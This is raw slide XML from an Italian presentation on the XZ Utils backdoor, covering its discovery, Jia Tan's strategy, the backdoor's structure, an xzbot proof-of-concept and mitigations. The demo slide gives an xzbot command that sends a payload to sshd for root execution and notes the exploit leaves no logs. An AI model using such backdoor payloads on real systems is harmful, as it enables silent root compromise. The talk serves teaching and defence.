              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>amlweems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 sceglie di stampare UID e GID dell'utente della backdoor, inviando un comando a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sshd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, attivo di default sulla porta localhost:2222.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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3758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87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955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xzbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> demo</a:t>
            </a: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1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$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xzbot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-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addr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127.0.0.1:2222 -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cmd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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>id &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz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'                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;-- in giallo, il comando inviato come payload
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00000000  00 00 00 1c 73 73 68 2d  72 73 61 2d 63 65 72 74  |....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ssh-rsa-cert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|           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>1. Stampa le ID utente, ID gruppo principale, ID gruppi secondari
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00000010  2d 76 30 31 40 6f 70 65  6e 73 73 68 2e 63 6f 6d  |-v01@openssh.com|           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>2. Scrivi la precedente stampa nel file .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> al percorso /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/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
00000020  00 00 00 00 00 00 00 03  01 00 01 00 00 01 01 01  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000160  00 00 01 14 00 00 00 07  73 73 68 2d 72 73 61 00  |........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ssh-rsa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.|
00000170  00 00 01 01 00 00 01 00  02 00 00 00 01 00 00 00  |................|
00000180  00 00 00 00 00 00 00 00  54 97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bc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c5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ef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93 e4 24  |........T......$|
00000190 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cf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b1 57 57 59 85 52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fd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  41 2a a5 54 9e aa c6 52  |..WWY.R.A*.T...R|
000001a0  58 64 a4 17 45 8a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af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76  ce d2 e3 0b 7c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bb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1f 29  |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Xd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..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E..v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....|..)|
000001b0  2b f0 38 45 3f 5e 00 f1  b0 00 15 84 e7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bc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10 1f  |+.8E?^..........|
000001c0  0f 5f 50 36 07 9f bd 07  05 77 5c 74 84 69 c9 7a  |._P6.....w\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t.i.z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|
000001d0  28 6b e8 16 aa 99 34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bf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  9d c4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c4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5c b8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fd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4a 3c  |(k....4....\..J&lt;|
000001e0  d8 2b 39 32 06 d9 4f a4  3a 00 d0 0b 0f a2 21 c0  |.+92..O.:.....!.|
000001f0  86 c3 c9 e2 e6 17 b4 a6  54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ba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c3 a1 4c 40 91 be  |........T...L@..|
00000200  91 9a 2b f8 0b 18 61 1c  5e e1 e0 5b e8 00 00 00  |..+...a.^..[....|
00000210  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...
00000260  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000270  00 00 00 00 00 00 00 00  00 00 00 10 00 00 00 07  |................|
00000280  73 73 68 2d 72 73 61 00  00 00 01 00              |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ssh-rsa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.....|
2024/03/30 00:00:00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ssh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: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handshake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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>failed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>: EOF</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37927500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Struttura della backdoor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88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971957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xzbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> demo</a:t>
            </a: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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> recupera il file e stampa su schermo il contenuto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=0(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=0(root) groups=0(root)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Questo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>-of-concept rivela che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> Tan aveva accesso con privilegi di amministratore sui sistemi operativi infetti. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> aggiunge inoltre: </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>successful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1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it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> INFO or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>higher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> log entries."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Le azioni illecite di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> Tan sarebbero state, quindi, non solo autorizzate, ma anche invisibili.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic N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26008413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12832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 sommario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89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2A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="863413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Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRP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La scoperta di Andres Freund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La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a: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 Tan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Struttura della backdoor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b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione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Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2289763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/>
              <a:t> Introduzione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86033" y="1984142"/>
            <a:ext cx="12102895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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Linux Foundation: macro-struttura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1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Linux si basa sulla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toolchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> GNU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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</a:rPr>
              <a:t>Torvalds Linux è lead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dello sviluppo kernel Linux;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zoë</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kooyman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chief</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>excecutive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nello sviluppo componenti GNU (Free Software Foundation);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>individui indipendenti sviluppano le componenti di terze parti non-GNU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr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XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è una libreria open-source sviluppata da Lasse Collin a partire dal 2009.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38031164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Forme di mitigazione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90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Rimedi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Per prima cosa si può procedere col visualizzare la versione della propria libreria, così da capire se è necessario un aggiornamento. </a:t>
            </a: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Per le backdoor sono stati creati software di controllo appositi, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-backdoor-scanner.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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Inoltre, aggiornare il prima possibile il proprio sistema operativo risulta sicuramente una mossa vincente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="791403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Forme di mitigazione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91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Aggiornamenti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Nella maggior parte dei casi, la backdoor non ha raggiunto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stabili di Linux, quindi si presume che i più colpiti siano stati </a:t>
            </a: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gli sviluppatori e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che nessun sistema di produzione sia stato toccato. In ogni caso, è stato effettuato prima di tutto un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rollback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alla 5.4.5-1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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5BAF8BA-A234-8377-67E1-DD6B062A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114" y="4000898"/>
            <a:ext cx="4562106" cy="253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525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Forme di mitigazione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92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Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils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Molti siti ed utenti hanno messo a disposizione dei plugin o piccoli script per verificare la versione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Anche Andres Freund ha allegato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detect.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alla mail su OSS.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9120AC-5A72-2642-20CA-7B9C8D9A85AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6319983" y="3921038"/>
            <a:ext cx="10205357" cy="2708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#! /bin/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bash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set -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eu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#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find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path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to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liblzma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used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by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sshd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path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="$(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ldd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$(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which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sshd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 |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grep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liblzma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|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grep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-o '/[^ ]*')"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#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does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it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even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exist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?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if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[ "$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path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 == "" ]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then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echo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probably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not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vulnerable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 exit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fi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# check for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function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signature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if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hexdump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-ve '1/1 "%.2x"' "$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path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 |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grep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-q f30f1efa554889f54c89ce5389fb8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
          <a:p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then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echo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probably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vulnerable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else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echo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probably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not</a:t>
            </a:r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it-IT" sz="1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vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" sz="10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fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" dirty="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D332432-70EF-2CF9-53BA-518B35BC3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02" y="4238680"/>
